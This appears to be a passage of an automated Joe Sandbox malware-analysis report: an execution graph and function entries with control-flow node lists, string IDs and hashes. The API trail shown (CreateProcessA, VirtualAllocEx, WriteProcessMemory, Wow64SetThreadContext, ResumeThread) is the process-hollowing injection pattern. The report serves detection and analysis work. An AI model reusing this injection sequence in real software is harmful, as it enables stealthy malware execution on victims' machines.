                                                Signature Coverage:0%
                                                Total number of Nodes:180
                                                Total number of Limit Nodes:17
                                                execution_graph 32668 16d4668 32669 16d4672 32668->32669 32671 16d4759 32668->32671 32672 16d477d 32671->32672 32676 16d4868 32672->32676 32680 16d4858 32672->32680 32677 16d488f 32676->32677 32678 16d496c 32677->32678 32684 16d44b0 32677->32684 32681 16d4868 32680->32681 32682 16d496c 32681->32682 32683 16d44b0 CreateActCtxA 32681->32683 32683->32682 32685 16d58f8 CreateActCtxA 32684->32685 32687 16d59bb 32685->32687 32687->32687 32699 16dac08 32703 16dacef 32699->32703 32711 16dad00 32699->32711 32700 16dac17 32704 16dad00 32703->32704 32705 16dad34 32704->32705 32719 16db388 32704->32719 32723 16db398 32704->32723 32705->32700 32706 16dad2c 32706->32705 32707 16daf38 GetModuleHandleW 32706->32707 32708 16daf65 32707->32708 32708->32700 32712 16dad01 32711->32712 32713 16dad34 32712->32713 32717 16db388 LoadLibraryExW 32712->32717 32718 16db398 LoadLibraryExW 32712->32718 32713->32700 32714 16dad2c 32714->32713 32715 16daf38 GetModuleHandleW 32714->32715 32716 16daf65 32715->32716 32716->32700 32717->32714 32718->32714 32720 16db3ac 32719->32720 32721 16db3d1 32720->32721 32727 16daf88 32720->32727 32721->32706 32724 16db3ac 32723->32724 32725 16db3d1 32724->32725 32726 16daf88 LoadLibraryExW 32724->32726 32725->32706 32726->32725 32728 16db558 LoadLibraryExW 32727->32728 32730 16db5d1 32728->32730 32730->32721 32891 16dd098 32892 16dd0de GetCurrentProcess 32891->32892 32894 16dd129 32892->32894 32895 16dd130 GetCurrentThread 32892->32895 32894->32895 32896 16dd16d GetCurrentProcess 32895->32896 32897 16dd166 32895->32897 32898 16dd1a3 32896->32898 32897->32896 32899 16dd1cb GetCurrentThreadId 32898->32899 32900 16dd1fc 32899->32900 32688 32bade0 32689 32baf6b 32688->32689 32691 32bae06 32688->32691 32691->32689 32692 32b92a0 32691->32692 32693 32bb060 PostMessageW 32692->32693 32694 32bb0cc 32693->32694 32694->32691 32695 16dd3a1 32696 16dd367 DuplicateHandle 32695->32696 32698 16dd3aa 32695->32698 32697 16dd376 32696->32697 32731 32b7f85 32735 32b9bf1 32731->32735 32752 32b9c00 32731->32752 32732 32b7f94 32736 32b9c00 32735->32736 32749 32b9c3e 32736->32749 32769 32ba1ab 32736->32769 32774 32ba374 32736->32774 32779 32ba173 32736->32779 32784 32b9f18 32736->32784 32790 32ba759 32736->32790 32795 32baac4 32736->32795 32799 32ba2c6 32736->32799 32807 32ba281 32736->32807 32811 32ba361 32736->32811 32816 32ba0e1 32736->32816 32822 32ba243 32736->32822 32827 32ba6ec 32736->32827 32832 32ba8c8 32736->32832 32837 32b9f28 32736->32837 32749->32732 32753 32b9c1a 32752->32753 32754 32ba1ab 2 API calls 32753->32754 32755 32b9f28 2 API calls 32753->32755 32756 32ba8c8 2 API calls 32753->32756 32757 32ba6ec 2 API calls 32753->32757 32758 32ba243 2 API calls 32753->32758 32759 32ba0e1 2 API calls 32753->32759 32760 32ba361 2 API calls 32753->32760 32761 32ba281 2 API calls 32753->32761 32762 32ba2c6 4 API calls 32753->32762 32763 32baac4 2 API calls 32753->32763 32764 32ba759 2 API calls 32753->32764 32765 32b9f18 2 API calls 32753->32765 32766 32b9c3e 32753->32766 32767 32ba173 2 API calls 32753->32767 32768 32ba374 2 API calls 32753->32768 32754->32766 32755->32766 32756->32766 32757->32766 32758->32766 32759->32766 32760->32766 32761->32766 32762->32766 32763->32766 32764->32766 32765->32766 32766->32732 32767->32766 32768->32766 32770 32ba1ba 32769->32770 32843 32b71ea 32770->32843 32847 32b71f0 32770->32847 32771 32ba437 32775 32ba397 32774->32775 32851 32b786a 32775->32851 32855 32b7870 32775->32855 32776 32ba5f5 32776->32749 32781 32ba1b5 32779->32781 32780 32ba781 32781->32749 32781->32780 32859 32b76d8 32781->32859 32863 32b76d0 32781->32863 32786 32b9f5b 32784->32786 32785 32ba01a 32785->32749 32786->32785 32867 32b7af8 32786->32867 32871 32b7aed 32786->32871 32791 32ba822 32790->32791 32875 32b77aa 32791->32875 32879 32b77b0 32791->32879 32792 32ba843 32797 32b786a WriteProcessMemory 32795->32797 32798 32b7870 WriteProcessMemory 32795->32798 32796 32baaeb 32797->32796 32798->32796 32803 32b76d8 Wow64SetThreadContext 32799->32803 32804 32b76d0 Wow64SetThreadContext 32799->32804 32800 32ba1d3 32801 32ba753 32800->32801 32805 32b71ea ResumeThread 32800->32805 32806 32b71f0 ResumeThread 32800->32806 32802 32ba437 32803->32800 32804->32800 32805->32802 32806->32802 32883 32b7958 32807->32883 32887 32b7960 32807->32887 32808 32ba150 32808->32749 32812 32ba36e 32811->32812 32814 32b71ea ResumeThread 32812->32814 32815 32b71f0 ResumeThread 32812->32815 32813 32ba437 32814->32813 32815->32813 32817 32ba01a 32816->32817 32818 32b9fba 32816->32818 32817->32749 32818->32817 32820 32b7af8 CreateProcessA 32818->32820 32821 32b7aed CreateProcessA 32818->32821 32819 32ba128 32819->32749 32820->32819 32821->32819 32823 32ba1b5 32822->32823 32823->32749 32824 32ba781 32823->32824 32825 32b76d8 Wow64SetThreadContext 32823->32825 32826 32b76d0 Wow64SetThreadContext 32823->32826 32825->32823 32826->32823 32828 32ba6f2 32827->32828 32830 32b786a WriteProcessMemory 32828->32830 32831 32b7870 WriteProcessMemory 32828->32831 32829 32ba20f 32829->32749 32830->32829 32831->32829 32833 32ba703 32832->32833 32834 32ba20f 32833->32834 32835 32b786a WriteProcessMemory 32833->32835 32836 32b7870 WriteProcessMemory 32833->32836 32834->32749 32835->32834 32836->32834 32839 32b9f5b 32837->32839 32838 32ba01a 32838->32749 32839->32838 32841 32b7af8 CreateProcessA 32839->32841 32842 32b7aed CreateProcessA 32839->32842 32840 32ba128 32840->32749 32841->32840 32842->32840 32844 32b71f0 ResumeThread 32843->32844 32846 32b7261 32844->32846 32846->32771 32848 32b7230 ResumeThread 32847->32848 32850 32b7261 32848->32850 32850->32771 32852 32b78b8 WriteProcessMemory 32851->32852 32854 32b790f 32852->32854 32854->32776 32856 32b78b8 WriteProcessMemory 32855->32856 32858 32b790f 32856->32858 32858->32776 32860 32b771d Wow64SetThreadContext 32859->32860 32862 32b7765 32860->32862 32862->32781 32864 32b76d8 Wow64SetThreadContext 32863->32864 32866 32b7765 32864->32866 32866->32781 32868 32b7b81 32867->32868 32868->32868 32869 32b7ce6 CreateProcessA 32868->32869 32870 32b7d43 32869->32870 32872 32b7af9 32871->32872 32872->32872 32873 32b7ce6 CreateProcessA 32872->32873 32874 32b7d43 32873->32874 32876 32b77f0 VirtualAllocEx 32875->32876 32878 32b782d 32876->32878 32878->32792 32880 32b77f0 VirtualAllocEx 32879->32880 32882 32b782d 32880->32882 32882->32792 32884 32b7960 ReadProcessMemory 32883->32884 32886 32b79ef 32884->32886 32886->32808 32888 32b79ab ReadProcessMemory 32887->32888 32890 32b79ef 32888->32890 32890->32808

                                                Executed Functions

                                                Function 077A4560 Relevance: 4.0, Strings: 3, Instructions: 299COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 851 77a4560-77a4562 852 77a456b-77a456e 851->852 853 77a4564-77a4566 851->853 854 77a456f-77a4570 852->854 855 77a4577-77a457a 852->855 853->854 856 77a4568-77a456a 853->856 857 77a4572 854->857 858 77a45b1-77a45b2 854->858 859 77a457b-77a457e 855->859 860 77a4583-77a4584 855->860 856->852 861 77a4573-77a4575 856->861 857->859 857->861 862 77a45bb-77a45be 858->862 863 77a45b3-77a45b6 858->863 864 77a4580 859->864 865 77a4587-77a458c 859->865 860->865 861->855 867 77a45bf-77a45c2 862->867 868 77a45c7-77a45ca 862->868 866 77a45b8 863->866 863->867 864->860 869 77a458e 865->869 870 77a45d2 865->870 866->862 871 77a45cb-77a45cd 867->871 872 77a45c4-77a45c5 867->872 868->871 873 77a45d3-77a45d4 868->873 874 77a4590-77a4596 869->874 875 77a4597-77a459d 869->875 870->873 876 77a45db-77a45e0 870->876 878 77a45ce 871->878 879 77a45d7-77a45d8 871->879 872->868 873->879 874->875 880 77a459f-77a45a2 874->880 875->880 877 77a45e3-77a45e8 876->877 877->878 881 77a45ea-77a45f0 877->881 878->879 882 77a45d0 878->882 885 77a45d9-77a45da 879->885 883 77a45ab-77a45ac 880->883 884 77a45a4 880->884 881->885 887 77a45f3-77a461b 881->887 882->870 886 77a45af-77a45b0 883->886 884->877 888 77a45a6 884->888 885->876 885->877 886->858 891 77a461d 887->891 892 77a4622-77a4698 887->892 888->886 890 77a45a8-77a45aa 888->890 890->863 890->883 891->892 897 77a469b 892->897 898 77a46a2-77a46be 897->898 899 77a46c0 898->899 900 77a46c7-77a46c8 898->900 899->897 901 77a47fa-77a4811 899->901 902 77a4728-77a472c 899->902 903 77a4758-77a476a 899->903 904 77a47d9-77a47f5 899->904 905 77a479e-77a47d4 899->905 906 77a476f-77a4799 899->906 907 77a46cd-77a46e2 899->907 908 77a4816-77a4886 899->908 909 77a46e4-77a4700 899->909 900->907 900->908 901->898 910 77a472e-77a473d 902->910 911 77a473f-77a4746 902->911 903->898 904->898 905->898 906->898 907->898 923 77a4888 call 77a58e8 908->923 924 77a4888 call 77a58d8 908->924 925 77a4888 call 77a5e6c 908->925 926 77a4888 call 77a6526 908->926 927 77a4888 call 77a5ee4 908->927 918 77a4708-77a4723 909->918 916 77a474d-77a4753 910->916 911->916 916->898 918->898 922 77a488e-77a4898 923->922 924->922 925->922 926->922 927->922
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 7afe37630eb2af068107638280cd54c9e20c03de9af3d71e4bab6e209d96f7ef
                                                • Instruction ID: 4f3f35918dc4b0fdbfda3bf2e7d6f71583bb1fad9df267ac9192b32856ddd721
                                                • Opcode Fuzzy Hash: 7afe37630eb2af068107638280cd54c9e20c03de9af3d71e4bab6e209d96f7ef
                                                • Instruction Fuzzy Hash: 6CB19AB1E102899FEF08CFA9D8816DDBBB2FBC9350F14822AD515AB314D7719942CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A45F8 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 928 77a45f8-77a461b 929 77a461d 928->929 930 77a4622-77a4698 928->930 929->930 935 77a469b 930->935 936 77a46a2-77a46be 935->936 937 77a46c0 936->937 938 77a46c7-77a46c8 936->938 937->935 939 77a47fa-77a4811 937->939 940 77a4728-77a472c 937->940 941 77a4758-77a476a 937->941 942 77a47d9-77a47f5 937->942 943 77a479e-77a47d4 937->943 944 77a476f-77a4799 937->944 945 77a46cd-77a46e2 937->945 946 77a4816-77a4886 937->946 947 77a46e4-77a4700 937->947 938->945 938->946 939->936 948 77a472e-77a473d 940->948 949 77a473f-77a4746 940->949 941->936 942->936 943->936 944->936 945->936 961 77a4888 call 77a58e8 946->961 962 77a4888 call 77a58d8 946->962 963 77a4888 call 77a5e6c 946->963 964 77a4888 call 77a6526 946->964 965 77a4888 call 77a5ee4 946->965 956 77a4708-77a4723 947->956 954 77a474d-77a4753 948->954 949->954 954->936 956->936 960 77a488e-77a4898 961->960 962->960 963->960 964->960 965->960
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 982494fcf42573e655492ae93480d86cf79f06f3ff870e9e65bd2130ebff3d48
                                                • Instruction ID: 55d7e775f6579af2fdcacf5cccf08d1fc3fbc690b86e03ea0ec9d5c975313094
                                                • Opcode Fuzzy Hash: 982494fcf42573e655492ae93480d86cf79f06f3ff870e9e65bd2130ebff3d48
                                                • Instruction Fuzzy Hash: 4581F2B0E102099FDB08CFAAC984AEEFBB2FF89304F20812AD415AB354D7759905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A66A8 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 3a89f661c4b682f378f17fb55ab5e5b4cae024a148d7ed436b5d9079ac74fc98
                                                • Instruction ID: 18c70cc59fd454c6000c664a3d8fb68305e5218d440ce5f3074e048936457ebd
                                                • Opcode Fuzzy Hash: 3a89f661c4b682f378f17fb55ab5e5b4cae024a148d7ed436b5d9079ac74fc98
                                                • Instruction Fuzzy Hash: 16F19FF1A24206EFE704DFA5D4814EEFBB2FB85390B18D666D511EB211C7349A82CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6717 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: a9fdcd9dfacb64e913201f8c86ac26cd1322afd29291ae9dd0060ba3d25aaa0b
                                                • Instruction ID: 6d34c82537b9138d247c4eeb25bf2a3976f66164bef6b19e3fbfd6dd9d439cc4
                                                • Opcode Fuzzy Hash: a9fdcd9dfacb64e913201f8c86ac26cd1322afd29291ae9dd0060ba3d25aaa0b
                                                • Instruction Fuzzy Hash: BDD18FB0E2420AEFDB04DFA5C4814AEFBB6FF89340B19D665D411EB215D7349A42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6798 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: e789cb659157dde210d5bf235dc113013cbd9cbf924a45fb631eb6cc06d54d39
                                                • Instruction ID: 51a3e8aeef079acb69755606e17d86f3f9a7205611bc233d2cbe7e17973cef66
                                                • Opcode Fuzzy Hash: e789cb659157dde210d5bf235dc113013cbd9cbf924a45fb631eb6cc06d54d39
                                                • Instruction Fuzzy Hash: 85D138B0D1520AEFDB04DFA6C4848AEFBB6FF89340F14D669D411AB215D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A3AD8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: d24c403f106aa7052350c9ad86a636c74a752f7693c5df308082a1204445d3bf
                                                • Instruction ID: c41a8ed39ce47da7d7a0083ea97d71a9d08884d67738d15a0a7799479c4201d2
                                                • Opcode Fuzzy Hash: d24c403f106aa7052350c9ad86a636c74a752f7693c5df308082a1204445d3bf
                                                • Instruction Fuzzy Hash: 85311CB1E006189BEB18CFABD84179EFBF7EFC8200F14C1BAD408A6254EB345A418F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A9840 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae4447e1de9035d0d58a0fe0966556d13a18f1653c11ea9973bc3b61eb231421
                                                • Instruction ID: cf285a9c1ec1340274bb19058221707a812a97fa2c27eb6a9da8737d06df5d37
                                                • Opcode Fuzzy Hash: ae4447e1de9035d0d58a0fe0966556d13a18f1653c11ea9973bc3b61eb231421
                                                • Instruction Fuzzy Hash: 01913AB0D15208EFDB48CFA6D5809ADFBF6FB8A340F20A519E116B7224D734A915CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A9830 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46c0a94cbc2c45b164a1b2ff0ea5148b966be37f0d84c5ec15e5628ac7adc055
                                                • Instruction ID: b624dd5007daee601e783d3e56b20c44431f38d3dd64c136b3c0c52696f7898f
                                                • Opcode Fuzzy Hash: 46c0a94cbc2c45b164a1b2ff0ea5148b966be37f0d84c5ec15e5628ac7adc055
                                                • Instruction Fuzzy Hash: 2D914AB0D11209EFDB48CFA6D5809ADFBF6FB8A340F20A526E116B7224D734A915CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A9528 Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f60f543bf696fc521fbbda6020c60fa36ee0ea4c7e7240f03331f9c2cd5c92cc
                                                • Instruction ID: 1987952d7561d5acd075f28422f60a3400dccee9849105057784389c6a96c8d5
                                                • Opcode Fuzzy Hash: f60f543bf696fc521fbbda6020c60fa36ee0ea4c7e7240f03331f9c2cd5c92cc
                                                • Instruction Fuzzy Hash: 148101B4E14219DFDF04CFA9C8819EEFBB2FB89240F10961AD911B7254D734A922CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A9519 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 918b6931e0e20045d4e800bb28e42396262e01c7ee19defa081b7a5ce523672f
                                                • Instruction ID: 44cea20bf21ec9500a4a1fa07d04bf72af4c000c76984d37b8e665c837af039b
                                                • Opcode Fuzzy Hash: 918b6931e0e20045d4e800bb28e42396262e01c7ee19defa081b7a5ce523672f
                                                • Instruction Fuzzy Hash: 9981F3B4E14219DFDF04CFA9C8819EEFBB2FF89240F10995AD911A7254D738A922CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A58E8 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6ca9393f1a60c142cfd63290a76ba8b72afdf7b86b7229e83838faffa357e18
                                                • Instruction ID: 93872bd102d2393107feec52629a9b81d4daa6100f4f2997be4f2c15e723838d
                                                • Opcode Fuzzy Hash: a6ca9393f1a60c142cfd63290a76ba8b72afdf7b86b7229e83838faffa357e18
                                                • Instruction Fuzzy Hash: B121E9B1E016189BEB18CF9BD8446DEFBF7AFC9350F14C17AD408A6258DB701A55CE50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A58D8 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec38eea3964c7ee51842c44415e668405d08f4d4987a6240f99aaebc7a481af6
                                                • Instruction ID: ca7d3b3689e8d5838956184471891b0e3b68da48babb4c626ae43cb638997581
                                                • Opcode Fuzzy Hash: ec38eea3964c7ee51842c44415e668405d08f4d4987a6240f99aaebc7a481af6
                                                • Instruction Fuzzy Hash: 9021DAB1E016589FEB18CFABC85529EBFF3AFC9310F18C16AD409AA254DB7419458F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A1DC8 Relevance: 16.5, Strings: 13, Instructions: 281COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 77a1dc8 295 77a1dcd-77a1dd0 294->295 296 77a1de2-77a1de6 295->296 297 77a1dd2 295->297 309 77a1de8-77a1df1 296->309 310 77a1e09 296->310 297->296 298 77a204b-77a2053 297->298 299 77a1e9b-77a1ea5 297->299 300 77a2058-77a206b 297->300 301 77a2179-77a2182 297->301 302 77a1faf-77a1fc2 297->302 303 77a209c-77a20b2 297->303 304 77a1ebc-77a1ec0 297->304 305 77a2092-77a2097 297->305 306 77a2162-77a2176 297->306 307 77a1f60-77a1f64 297->307 308 77a2114-77a213e 297->308 298->295 314 77a1eab-77a1eb7 299->314 315 77a2185-77a219d 299->315 341 77a208b-77a2090 300->341 342 77a206d-77a2074 300->342 302->315 344 77a1fc8-77a1fd0 302->344 334 77a20c8 303->334 335 77a20b4-77a20c6 303->335 316 77a1ec2-77a1ecb 304->316 317 77a1ee3 304->317 305->295 312 77a1f66-77a1f6f 307->312 313 77a1f87 307->313 385 77a214a-77a2154 308->385 386 77a2140 308->386 318 77a1df8-77a1e05 309->318 319 77a1df3-77a1df6 309->319 311 77a1e0c-77a1e0e 310->311 322 77a1e10-77a1e16 311->322 323 77a1e26-77a1e43 311->323 325 77a1f71-77a1f74 312->325 326 77a1f76-77a1f83 312->326 327 77a1f8a-77a1faa 313->327 314->295 330 77a1ecd-77a1ed0 316->330 331 77a1ed2-77a1edf 316->331 321 77a1ee6-77a1eea 317->321 333 77a1e07 318->333 319->333 336 77a1eec-77a1efe 321->336 337 77a1f00 321->337 338 77a1e1a-77a1e24 322->338 339 77a1e18 322->339 362 77a1e66 323->362 363 77a1e45-77a1e4e 323->363 340 77a1f85 325->340 326->340 327->295 343 77a1ee1 330->343 331->343 333->311 347 77a20cb-77a20d8 334->347 335->347 348 77a1f03-77a1f07 336->348 337->348 338->323 339->323 340->327 354 77a2086 341->354 342->315 353 77a207a-77a2081 342->353 343->321 356 77a1fd2-77a1fdb 344->356 357 77a1ff3 344->357 378 77a20da-77a20e0 347->378 379 77a20f0-77a20fd 347->379 358 77a1f28 348->358 359 77a1f09-77a1f12 348->359 353->354 354->295 364 77a1fdd-77a1fe0 356->364 365 77a1fe2-77a1fef 356->365 360 77a1ff6-77a1ff8 357->360 372 77a1f2b-77a1f4c 358->372 368 77a1f19-77a1f1c 359->368 369 77a1f14-77a1f17 359->369 370 77a1ffa-77a2000 360->370 371 77a2016 360->371 375 77a1e69-77a1e92 call 77a34ef 362->375 373 77a1e50-77a1e53 363->373 374 77a1e55-77a1e62 363->374 366 77a1ff1 364->366 365->366 366->360 380 77a1f26 368->380 369->380 381 77a2002-77a2004 370->381 382 77a2006-77a2012 370->382 383 77a2018-77a201a 371->383 372->315 399 77a1f52-77a1f5b 372->399 384 77a1e64 373->384 374->384 403 77a1e98 375->403 387 77a20e2 378->387 388 77a20e4-77a20e6 378->388 379->315 390 77a2103-77a210f 379->390 380->372 389 77a2014 381->389 382->389 392 77a201c-77a2022 383->392 393 77a2034-77a2046 383->393 384->375 385->315 397 77a2156-77a2160 385->397 396 77a2145 386->396 387->379 388->379 389->383 390->295 400 77a2026-77a2032 392->400 401 77a2024 392->401 393->295 396->295 397->396 399->295 400->393 401->393 403->299
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: 6c6c04ab8a0a435a5f4895e1376cacb08fbceb49459f9c0532ff38c0e39b7ccc
                                                • Instruction ID: ea22af3d937549addb5c1258596f6fb49953c4f1183b50e4a03372a81df2f75b
                                                • Opcode Fuzzy Hash: 6c6c04ab8a0a435a5f4895e1376cacb08fbceb49459f9c0532ff38c0e39b7ccc
                                                • Instruction Fuzzy Hash: 9EB1C3B0E1421DEFFB18CF94C944AADB7B2BBC5781F648A66E5016F295CB309C45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0448 Relevance: 14.2, Strings: 11, Instructions: 453COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 77a0448-77a0483 567 77a0488 call 77a0b70 406->567 568 77a0488 call 77a0b80 406->568 408 77a048e-77a04fe call 77a0314 419 77a0503-77a0506 408->419 420 77a0508 419->420 421 77a050f-77a0519 419->421 420->421 422 77a053b-77a0571 call 77a2d12 420->422 423 77a071c-77a0729 420->423 424 77a059d-77a05a3 420->424 425 77a0630-77a0692 420->425 426 77a07f0 420->426 427 77a0731-77a073b 420->427 428 77a0697-77a06aa 420->428 429 77a07d4-77a07e1 420->429 430 77a05ea-77a05f1 420->430 431 77a07e9-77a07ee 420->431 432 77a074e 420->432 433 77a06c2-77a06c6 420->433 434 77a0580-77a058a 420->434 435 77a0787-77a078b 420->435 436 77a0605-77a060f 420->436 437 77a051f-77a052d 421->437 438 77a06ac 421->438 519 77a0577-77a057e 422->519 423->427 451 77a05a9-77a05b5 424->451 452 77a05a5-77a05a7 424->452 425->419 455 77a07fd-77a0800 426->455 443 77a073d-77a0749 427->443 444 77a0751-77a0776 427->444 446 77a06b1 428->446 429->431 430->438 439 77a05f7-77a0600 430->439 440 77a077b-77a077e 431->440 432->444 453 77a06c8-77a06d1 433->453 454 77a06e7 433->454 447 77a058c 434->447 448 77a0596-77a059b 434->448 449 77a07ac 435->449 450 77a078d-77a0796 435->450 441 77a0618-77a061f 436->441 442 77a0611 436->442 437->438 445 77a0533-77a0539 437->445 438->446 439->419 440->435 463 77a0780 440->463 441->438 457 77a0625-77a062e 441->457 456 77a0613 442->456 460 77a06b6-77a06b9 443->460 444->440 445->419 446->460 464 77a0591 447->464 448->464 467 77a07af-77a07b1 449->467 465 77a0798-77a079b 450->465 466 77a079d-77a07a0 450->466 468 77a05b7-77a05e5 451->468 452->468 469 77a06d8-77a06db 453->469 470 77a06d3-77a06d6 453->470 472 77a06ea-77a06ec 454->472 473 77a0812-77a0816 455->473 474 77a0802 455->474 456->419 457->456 460->433 484 77a06bb 460->484 463->426 463->429 463->431 463->435 463->473 476 77a090a-77a0983 463->476 477 77a0a8a-77a0aa1 463->477 478 77a09a8-77a09b6 463->478 479 77a0ad2-77a0ad9 463->479 480 77a0903-77a0905 463->480 481 77a0854-77a0858 463->481 482 77a09f5-77a0a6b 463->482 464->419 483 77a07aa 465->483 466->483 485 77a07cd-77a07d2 467->485 486 77a07b3-77a07bd 467->486 468->419 488 77a06e5 469->488 470->488 489 77a0708-77a070f 472->489 490 77a06ee-77a06f8 472->490 491 77a0818-77a0821 473->491 492 77a0839 473->492 474->473 474->476 474->477 474->478 474->479 474->480 474->481 474->482 556 77a099b-77a09a3 476->556 557 77a0985-77a098b 476->557 533 77a0ab9-77a0ac1 call 77ae462 477->533 534 77a0aa3-77a0aa9 477->534 520 77a09b8-77a09be 478->520 521 77a09ce-77a09d5 478->521 480->455 494 77a085a-77a0863 481->494 495 77a087b 481->495 563 77a0a71-77a0a85 482->563 483->467 484->423 